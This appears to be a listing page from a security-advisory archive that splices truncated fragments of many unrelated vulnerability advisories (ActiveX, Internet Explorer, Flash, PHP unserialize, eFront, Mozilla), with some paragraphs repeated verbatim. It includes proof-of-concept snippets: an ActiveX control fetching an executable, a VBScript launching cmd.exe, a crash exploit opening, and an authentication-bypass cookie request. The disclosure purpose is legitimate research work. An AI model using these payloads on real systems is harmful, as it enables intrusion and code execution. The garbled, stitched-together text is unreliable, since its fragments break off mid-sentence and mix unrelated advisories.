Next Page >>
objects
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Software Object-group Access
Control List Bypass Vulnerability
Advisory ID: cisco-sa-20090923-acl
Revision 1.0
The HTML code needed to start a download using the ActiveX control looks
something like the following code:
<html><body>
<object id="dm" classid="CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967"
codebase="http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8" width="1" height="1">
<PARAM name="URL"
value="http://www.akitasecurity.nl/advisory/RunCalc.exe"/>
</object>
<a href="javascript:dm.StartDownload();">start download</a>
concatenation of those byte ranges of the final file that are specified
by the ByteRange field.
To simplify the reasoning about the attack, a model of a "byte sequence
with a gap of a defined size" will be used in the following--the "gap"
being an object that occupies address space in the sequence but doesn't
have any properties besides that.
Using this model, one can describe the process of the creation of a
signed PDF file as follows:
Hash: SHA1
~ Core Security Technologies - CoreLabs Advisory
~ http://www.coresecurity.com/corelabs/
~ Anzio Web Print Object Buffer Overflow
*Advisory Information*
Title: Anzio Web Print Object Buffer Overflow
CVE-2010-3451:
OpenOffice.org uses its own internal memory management system for parsing
tables in RTF documents. Information about each table row is inserted, element
by element, into an SwTableBoxes object. These objects contain a fixed amount
of data, and when they have reached capacity, a resize() method is called to
double the space previously allocated for cell contents. When this method is
called, the new space will be allocated on top of recently freed memory
containing file data without clearing this memory. Because of a bug in the RTF
parser, corrupt table data may cause the insertion of elements into an
The following PoC code is available:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
var optarray;
var mshtmlbase;
//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;
function strtoint(str) {
by add-ons that might perform privileged actions resulting in
something like a Cross-Site Request Forgery (CSRF) attack against
the add-on. Potential severity would depend on the add-ons installed
(CVE-2010-0168).
Mozilla developer Blake Kaplan reported that the window.location object
was made a normal overridable JavaScript object in the Firefox 3.6
browser engine (Gecko 1.9.2) because new mechanisms were developed
to enforce the same-origin policy between windows and frames. This
object is unfortunately also used by some plugins to determine the page
origin used for access restrictions. A malicious page could override
by add-ons that might perform privileged actions resulting in
something like a Cross-Site Request Forgery (CSRF) attack against
the add-on. Potential severity would depend on the add-ons installed
(CVE-2010-0168).
Mozilla developer Blake Kaplan reported that the window.location object
was made a normal overridable JavaScript object in the Firefox 3.6
browser engine (Gecko 1.9.2) because new mechanisms were developed
to enforce the same-origin policy between windows and frames. This
object is unfortunately also used by some plugins to determine the page
origin used for access restrictions. A malicious page could override
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ESA-2010-018: RSA Security Advisory: RSA, The Security Division of EMC, announces a fix for a potential security vulnerability in RSA® Authentication Client when storing secret key objects on an RSA SecurID® 800 Authenticator
RSA Authentication Client 2.0.x, 3.0, and 3.5.x contain a potential vulnerability that could allow the unintended extraction, by a properly authenticated user, of secret (or symmetric) key objects stored on an RSA SecurID 800 Authenticator. This potential vulnerability is corrected in RSA Authentication Client 3.5.3.
Description:
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities
1. *Advisory Information*
Title: Internet Explorer Dynamic OBJECT tag and URLMON sniffing
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 11, 2009
I. BACKGROUND
Microsoft's Component Object Model (COM) was designed to allow
interoperability between disjointed software components. It is a
standardized interface solution to the programming dilemmas involved in
object oriented programming, distributed transactions, and
inter-language communications. COM is involved at some level in DDE,
OLE, COM+, ActiveX, and DCOM. COM objects can be embedded in various
</script>
</head>
<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
classid="clsid:62DDEB79-15B2-41E3-8834-D3B80493887A"
</object>
</body>
</html>
= vstlbinf.dll
=
= Public disclosure on Wednesday August 15, 2007
========================================================================
The TypeLib Information object library , implemented in TlbInf32.dll,
is a set of COM objects designed to make type library browsing
functionality easily accessible to both Visual Basic and C++
programmers.
Although it is not marked as safe for scripting in the registry, it does
Testing shows that to some degree, ClickOnce does check whether it is
loaded from the Temporary Internet Files folder. In such a situation,
ClickOnce will show a warning dialog similar to the dialog shown in
figure 1. This specifically happens when the ClickOnce application files
are saved in the Temporary Internet Files folder using Internet
Explorer; for example using object tags with the type attribute set to
text/plain. If the deployment manifest is opened (i.e. using Windows
Explorer), the warning is shown.
Permissions in the Local Machine security zone
Main advantage over the previous command line tools CACLS.EXE [5],
XCACLS.EXE [6] and XCACLS.VBS [7] is the ability to specify
inheritance and to process/propagate inheritable permissions.
But exactly the handling of inheritance is severely broken: in an
objects security descriptor both DACLs and SACLs can be marked as
"PROTECTED", meaning that inheritable ACEs from the parent object
are NOT to be applied to an object and its children [8][9].
ICACLS.EXE, when operating on an object with protected ACLs, but
1. ignores this protection,
http://www.adobe.com/products/flashplayer
II. DESCRIPTION
Remote exploitation of a invalid object reference vulnerability in Adobe
Systems Inc.'s Flash Player could allow an attacker to execute arbitrary
code with the privileges of the current user.
During the processing of a Shockwave Flash file, a particular object can
be created, along with multiple references that point to the object. The
This will unserialize() any user input supplied to an application
using PHPIDS. Therefore an exploit against applications using the
Zend Framework is pretty straight forward.
When trying to exploit an unserialize() vulnerability in a PHP
application the first step is to enumerate the objects that contain
__wakeup() or __destruct() methods and read their code to analyze if
these methods are doing something interesting.
When looking at the Zend Framework one particular class can be
found that can be used in an code execution attack. This class is
###############################################################################################
5QIM 2.0.0.9 IE Crash Exploit
2008-02-25 08:26
<object id="xiaonei" classid="clsid:5C56F4A7-71FC-4FFD-A9D7-18FB87A9DFC6"
style="display:none;">
</object>
<script>
function crash() {
var buff = '';
high profile websites like: banking websites, political party websites,
gaming websites, blogs and even security company websites.
During our research in unserialize() vulnerabilities it was discovered
that Piwik unserializes data from the user supplied cookie. By
unserializing some of Piwik's objects it is possible to write
arbitrary files to writable locations on the webserver which
can be used to upload e.g. PHP files to writable directories
within the webserver's document root which usually exist in a
standard Piwik installation. In newer versions of Piwik it is
also possible to execute arbitrary PHP code directly.
207. try {
208. $user = EfrontUserFactory :: factory($_COOKIE['cookie_login']);
209. $user -> login($_COOKIE['cookie_password'], true);
Input passed through $_COOKIE['cookie_login'] isn't properly sanitized before being used at
line 208 to instanciate a new user object using EfrontUserFactory::factory() method, this can
be exploited to bypass authentication and to escalate privilege. Proof of concept request:
GET /efront/www/index.php HTTP/1.1
Host: localhost
Cookie: cookie_login[login]=admin;cookie_login[active]=1;cookie_login[user_type]=administrator;cookie_login[password]=1;cookie_password=1
- $username = $_POST['reset_username'];
- $userrows = select_bhdb("users", array("username"=>$username), "");
+ $xgqd_username = $_POST['reset_username'];
+ $userrows = select_bhdb("users", array("username"=>$xgqd_username), "");
if (empty($userrows)) {
# Open layout object
$layoutobj = new bhlayout("generic");
@@ -31,16 +31,16 @@
} else {
# Insert a password reset request row for that username
$resetid = md5(time().rand(1, 99999).rand(54, time()));
Day Initiative that JavaScript arrays were vulnerable to an integer
overflow vulnerability. The report demonstrated that an array could
be constructed containing a very large number of items such that when
memory was allocated to store the array items, the integer value used
to calculate the buffer size would overflow resulting in too small a
buffer being allocated. Subsequent use of the array object could then
result in data being written past the end of the buffer and causing
memory corruption (CVE-2010-3767).
Security researcher regenrecht reported via TippingPoint's Zero Day
Initiative that a nsDOMAttribute node can be modified without informing
Day Initiative that JavaScript arrays were vulnerable to an integer
overflow vulnerability. The report demonstrated that an array could
be constructed containing a very large number of items such that when
memory was allocated to store the array items, the integer value used
to calculate the buffer size would overflow resulting in too small a
buffer being allocated. Subsequent use of the array object could then
result in data being written past the end of the buffer and causing
memory corruption (CVE-2010-3767).
Security researcher regenrecht reported via TippingPoint's Zero Day
Initiative that a nsDOMAttribute node can be modified without informing
Day Initiative that JavaScript arrays were vulnerable to an integer
overflow vulnerability. The report demonstrated that an array could
be constructed containing a very large number of items such that when
memory was allocated to store the array items, the integer value used
to calculate the buffer size would overflow resulting in too small a
buffer being allocated. Subsequent use of the array object could then
result in data being written past the end of the buffer and causing
memory corruption (CVE-2010-3767).
Security researcher regenrecht reported via TippingPoint's Zero Day
Initiative that a nsDOMAttribute node can be modified without informing
Remote exploitation of a memory corruption vulnerability in Microsoft
Corp.'s Internet Explorer could allow an attacker to execute arbitrary
code with the privileges of the current user.
The vulnerability occurs when a Javascript event handler such as
"onload" is set to a Javascript object's attributes or childNodes
collection. A event object is created and this object's memory is later
freed; however, a reference to the object remains. When the reference is
later used to access the event object, this now-invalid memory is
treated as a valid object. The corrupt object's vtable is used to make
an indirect function call. This may result in the execution of arbitrary
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 28, 2009
I. BACKGROUND
Microsoft's Component Object Model (COM) was designed to allow
interoperability between disjointed software components. It is a
standardized interface solution to the programming dilemmas involved in
object oriented programming, distributed transactions, and
inter-language communications. COM is involved at some level in DDE,
OLE, COM+, ActiveX, and DCOM. COM objects can be embedded in various
viewed by referring to the same folder using the UNC notation:
'\\[COMPUTERNAME|127.0.0.1]\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5'.
3. There are some HTML tags which allow to embed contents from
external files and treat them with a specific format disregarding the
file extension. For example, the HTML '<object/>' tag:
/-----------
<object data="index.dat" type="text/html" width="100%" height="50"></object>
- -----------/
http://www.adobe.com/products/flashplayer
II. DESCRIPTION
Remote exploitation of an invalid Loader object reference vulnerability
in Adobe Systems Inc.'s Flash Player could allow an attacker to execute
arbitrary code with the privileges of the current user.
During the processing of a Shockwave Flash file, an object can be
created, along with multiple references that point to the object. The
Remote exploitation of a use after free vulnerability in Microsoft
Corp.'s Internet Explorer could allow an attacker to execute arbitrary
code with the privileges of the current user.
The vulnerability occurs when an HTML object with an
'onreadystatechange' event handler is not properly freed. This event is
used to perform actions when the state of some HTML object changes; for
example, when a form has data input. Specifically, when certain
properties of the object are changed, the event handler function object
is freed, but a reference to it remains. When the object is later
Next Page>>
|
